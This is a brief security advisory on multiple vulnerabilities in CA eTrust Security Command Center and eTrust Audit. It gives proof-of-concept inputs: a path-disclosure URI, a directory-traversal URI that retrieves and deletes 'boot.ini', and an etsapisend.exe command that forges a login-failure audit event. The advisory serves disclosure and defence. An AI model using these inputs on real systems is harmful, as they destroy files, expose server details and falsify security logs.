CA eTrust Security Command Center and eTrust Audit Multiple Vulnerabilities

CA eTrust Security Command Center and eTrust Audit Multiple Vulnerabilities

Attackers may exploit these issues using a web browser or the 'etsapisend.exe' executeable.

The following URI demonstrates the path-disclosure issue:
https://www.example.com:8080/etrust/servlet/ePPIServlet?PIProfile=eAV_Report's&PIName=Generate+Pre-7.1+Report+Data&profile= Threat+Management&node=

The following URI demonstrates the arbitrary-file-access/removal issue by retrieving 'boot.ini' and then deleting it:
https://www.example.com:8080/etrust/servlet/eSMPAuditServlet?verb=getadhochtml&eSCCAdHocHtmlFile=../../../../../../../boot.ini

The following command-line example will send a login-failure event:
etsapisend.exe -nod $dstIP -cat "System Access" -opr Logon -sta F -nam NT-Security -loc \\Domain\IIS_Server -usr System -evt 70 -src Security -nid 529 -inf "Logon Failure"